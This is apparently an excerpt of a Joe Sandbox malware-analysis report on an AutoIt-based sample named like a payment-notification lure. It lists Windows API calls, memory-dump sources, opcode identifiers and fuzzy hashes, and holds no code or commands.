                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                              • API String ID: 176396367-4004644295
                                                                              • Opcode ID: cb4bb3eff2472ff836d2430976c3cfe7196111a6da04db666e76c7038d1d1e15
                                                                              • Instruction ID: ed1ddfbab9e946fcc460f9c81827921757d13cc9cc16e1d1098abe4a63c4dc58
                                                                              • Opcode Fuzzy Hash: cb4bb3eff2472ff836d2430976c3cfe7196111a6da04db666e76c7038d1d1e15
                                                                              • Instruction Fuzzy Hash: 9F3106F3A005694BCB30EFECC9411BE33999BA2790B454129FCD5AB345EA70CD80D3A1
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00972F8D
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00972F94
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00972FA9
                                                                              • DestroyWindow.USER32(?), ref: 00972FB1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 3529120543-1011021900
                                                                              • Opcode ID: f35e2821e378fb64ae3af0968a26ab7edec880d30248b9e411d35a1884cd6e7d
                                                                              • Instruction ID: 2d0124c833bce2d89b2855b5b6f8a39ba720617d2794c3338ad1ad3342213d3c
                                                                              • Opcode Fuzzy Hash: f35e2821e378fb64ae3af0968a26ab7edec880d30248b9e411d35a1884cd6e7d
                                                                              • Instruction Fuzzy Hash: 4D219D73224205ABEF104FA8DC80FBB77BDEB59368F108619F958D61A0E771DC91A760
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00904D1E,009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002), ref: 00904D8D
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00904DA0
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00904D1E,009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000), ref: 00904DC3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: c3ceabb61ff9010c04ecc7de6328c029822298c5aef8496c6e7f48482411b226
                                                                              • Instruction ID: ffffc7d5d35b6daca47e2f7ccd002f83d141fbb79a07c5b35e9585bbda0c1851
                                                                              • Opcode Fuzzy Hash: c3ceabb61ff9010c04ecc7de6328c029822298c5aef8496c6e7f48482411b226
                                                                              • Instruction Fuzzy Hash: DBF044B5654218BFDB115F90DC49B9DBBB9EF84755F440068F909A6290CB305980DBD1
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E9C
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4EAE
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EC0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 145871493-3689287502
                                                                              • Opcode ID: f87133e4e20f0d6e24875599087c6cc5c28e90ccec15a5d8060f75dd525dc2a5
                                                                              • Instruction ID: 3a7c49da479804d1eb22208e8526c92651fdff3d2d1f22b67394168339ef732f
                                                                              • Opcode Fuzzy Hash: f87133e4e20f0d6e24875599087c6cc5c28e90ccec15a5d8060f75dd525dc2a5
                                                                              • Instruction Fuzzy Hash: EFE08677A195636B93311B266C19A5F6654FFC2F72B054129FC0CD2100DB60CD4195A0
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E62
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4E74
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 145871493-1355242751
                                                                              • Opcode ID: 4b9aea0984dafbc5688e3be74f6a1a55233ea88b19c55acdaf3761dac4326d5f
                                                                              • Instruction ID: fca82a301852679e8a2f8e8c6f684d839d8763daa54e53cec73b6b9b7c834c37
                                                                              • Opcode Fuzzy Hash: 4b9aea0984dafbc5688e3be74f6a1a55233ea88b19c55acdaf3761dac4326d5f
                                                                              • Instruction Fuzzy Hash: 09D0C27391A6625746221B266C08D8F6A18FF8AF253894128B80CE2110CF20CD41D5D0
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952C05
                                                                              • DeleteFileW.KERNEL32(?), ref: 00952C87
                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00952C9D
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952CAE
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952CC0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: File$Delete$Copy
                                                                              • String ID:
                                                                              • API String ID: 3226157194-0
                                                                              • Opcode ID: 648a68bf6bcf4a2786e7d1b4202d85525ca4770d3e83a96107a10628c9f83d19
                                                                              • Instruction ID: 11fa29512b5a71827cbe75e0c81b81bdb8efc98ff3712735c2a8ec96b6bd473e
                                                                              • Opcode Fuzzy Hash: 648a68bf6bcf4a2786e7d1b4202d85525ca4770d3e83a96107a10628c9f83d19
                                                                              • Instruction Fuzzy Hash: D6B14E72D00119ABDF15DBA5CC85EDEB7BDEF4A354F1040A6FA09E6141EB309A488FA1
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 0096A427
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0096A435
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0096A468
                                                                              • CloseHandle.KERNEL32(?), ref: 0096A63D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                              • String ID:
                                                                              • API String ID: 3488606520-0
                                                                              • Opcode ID: c9d60ea8984b627871a9167d17a50900014d0d62999570dc9befa4d51e8fc026
                                                                              • Instruction ID: 2ae8deb4cec532c333b0b8b64543391b2095ea3f466bcbea7ef4e59dcdfef31d
                                                                              • Opcode Fuzzy Hash: c9d60ea8984b627871a9167d17a50900014d0d62999570dc9befa4d51e8fc026
                                                                              • Instruction Fuzzy Hash: 12A16C71604301AFD720DF29D886B2AB7E5EF84714F14885DF59ADB392DBB0EC418B92
                                                                              APIs
                                                                                • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0094CF22,?), ref: 0094DDFD
                                                                                • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0094CF22,?), ref: 0094DE16
                                                                                • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0094E473
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0094E4AC
                                                                              • _wcslen.LIBCMT ref: 0094E5EB
                                                                              • _wcslen.LIBCMT ref: 0094E603
                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0094E650
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3183298772-0
                                                                              • Opcode ID: 045edd366cec23b142d70a28eb39cc507441b998fec5316bee880aa9170d6bcf
                                                                              • Instruction ID: e9473261fdd93ba8545e45f322a37ad79ed80da8d2733ac3c4d63a618d192773
                                                                              • Opcode Fuzzy Hash: 045edd366cec23b142d70a28eb39cc507441b998fec5316bee880aa9170d6bcf
                                                                              • Instruction Fuzzy Hash: 415142B25083859FC724EB94D881EDB73ECAFC5344F00492EF589D3191EF74A6888B66
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                                • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BAA5
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096BB00
                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0096BB63
                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0096BBA6
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0096BBB3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                              • String ID:
                                                                              • API String ID: 826366716-0
                                                                              • Opcode ID: 7adff5f2163f57552c6b16636c65c244c67ed0e105a8ba9beef1d3e3cb015be7
                                                                              • Instruction ID: 41ffa0ac3c58f5a31d5c35a934f2591b661aa18d6d438e29b8bfcbc774874026
                                                                              • Opcode Fuzzy Hash: 7adff5f2163f57552c6b16636c65c244c67ed0e105a8ba9beef1d3e3cb015be7
                                                                              • Instruction Fuzzy Hash: 6861A571208241EFD714DF64C490E2ABBE9FF85308F54895DF4998B2A2DB31ED85CB92
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 00948BCD
                                                                              • VariantClear.OLEAUT32 ref: 00948C3E
                                                                              • VariantClear.OLEAUT32 ref: 00948C9D
                                                                              • VariantClear.OLEAUT32(?), ref: 00948D10
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00948D3B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                              • String ID:
                                                                              • API String ID: 4136290138-0
                                                                              • Opcode ID: 3cf852498a87d3268a28c43d461dc22e1316ffeb8ae49efcf3658e20dc8faabb
                                                                              • Instruction ID: ffd74cbd23f28520895da62d29f543abdc9f365aeadb25c0ba12d4846798491c
                                                                              • Opcode Fuzzy Hash: 3cf852498a87d3268a28c43d461dc22e1316ffeb8ae49efcf3658e20dc8faabb
                                                                              • Instruction Fuzzy Hash: 3B5166B5A11219EFCB14CF68C884EAAB7F9FF89314B158569E909DB350E730E911CF90
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00958BAE
                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00958BDA
                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00958C32
                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00958C57
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00958C5F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                              • String ID:
                                                                              • API String ID: 2832842796-0
                                                                              • Opcode ID: 545f4e8990cd015289dd4596c9930eb513e0d26daeafa98448d16d74dda8ead0
                                                                              • Instruction ID: 66eb0723636257dc6f377df85f4e3a44e70e1f3f7b7e059845dac0e0a6d25ba7
                                                                              • Opcode Fuzzy Hash: 545f4e8990cd015289dd4596c9930eb513e0d26daeafa98448d16d74dda8ead0
                                                                              • Instruction Fuzzy Hash: 9D516A75A00618AFCB00DF69C881E6EBBF5FF49314F088458E949AB362DB31ED55CB91
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00968F40
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00968FD0
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00968FEC
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00969032
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00969052
                                                                                • Part of subcall function 008FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00951043,?,753CE610), ref: 008FF6E6
                                                                                • Part of subcall function 008FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0093FA64,00000000,00000000,?,?,00951043,?,753CE610,?,0093FA64), ref: 008FF70D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                              • String ID:
                                                                              • API String ID: 666041331-0
                                                                              • Opcode ID: 9b530801b5d030da46b6d97ba8388706b7607cea4ced25ca85ea21701ed36ac7
                                                                              • Instruction ID: 83f33f62c28d1a3d5f42122b8d983ae3e3bb1acf995dca8aa8e669037729f2c8
                                                                              • Opcode Fuzzy Hash: 9b530801b5d030da46b6d97ba8388706b7607cea4ced25ca85ea21701ed36ac7
                                                                              • Instruction Fuzzy Hash: F6516C75604245DFCB11DF68C4848AEBBF5FF49314B0481A8E91AAB362DB31ED86CF91
                                                                              APIs
                                                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00976C33
                                                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00976C4A
                                                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00976C73
                                                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0095AB79,00000000,00000000), ref: 00976C98
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00976CC7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$MessageSendShow
                                                                              • String ID:
                                                                              • API String ID: 3688381893-0
                                                                              • Opcode ID: 29518683dc28477fadfdf0618a55f108b876532efad19e263f6d533460b5ab88
                                                                              • Instruction ID: d8bd65c58a868f4993ae148e7125fd22bf702a0566507ddfe48353d7562d2d2c
                                                                              • Opcode Fuzzy Hash: 29518683dc28477fadfdf0618a55f108b876532efad19e263f6d533460b5ab88
                                                                              • Instruction Fuzzy Hash: 5D41E777604504AFD725CF38CD55FA57BA8EB49360F188268FADDA72E0C371AD40DA40
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: 2b53926a9be1023dda11871d9db60cdd6bd1150319a7a5be4906875e124b4664
                                                                              • Instruction ID: c5a4f5dcaee2ca2689019592483eb93582e0049e335b730cbc4b0dfc32732bb6
                                                                              • Opcode Fuzzy Hash: 2b53926a9be1023dda11871d9db60cdd6bd1150319a7a5be4906875e124b4664
                                                                              • Instruction Fuzzy Hash: E141D472B00208AFCB24EF78C881A9DB7E5EF89314F1545A8E615EB352DB31AD51CB81
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 008F9141
                                                                              • ScreenToClient.USER32(00000000,?), ref: 008F915E
                                                                              • GetAsyncKeyState.USER32(00000001), ref: 008F9183
                                                                              • GetAsyncKeyState.USER32(00000002), ref: 008F919D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                              • String ID:
                                                                              • API String ID: 4210589936-0
                                                                              • Opcode ID: 04dc9d99c4b5fba8118a0285374e87ad2de83079df2cecd65a58c1f06078ff83
                                                                              • Instruction ID: 372609fdf46f986840249a3f9afecb65ccc7f93b222083d6bb3485594fac30f4
                                                                              • Opcode Fuzzy Hash: 04dc9d99c4b5fba8118a0285374e87ad2de83079df2cecd65a58c1f06078ff83
                                                                              • Instruction Fuzzy Hash: B8415F7290C60AFBDF159FA8C844BFEB775FB05324F208229E569A2290C7346990DF91
                                                                              APIs
                                                                              • GetInputState.USER32 ref: 009538CB
                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00953922
                                                                              • TranslateMessage.USER32(?), ref: 0095394B
                                                                              • DispatchMessageW.USER32(?), ref: 00953955
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00953966
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
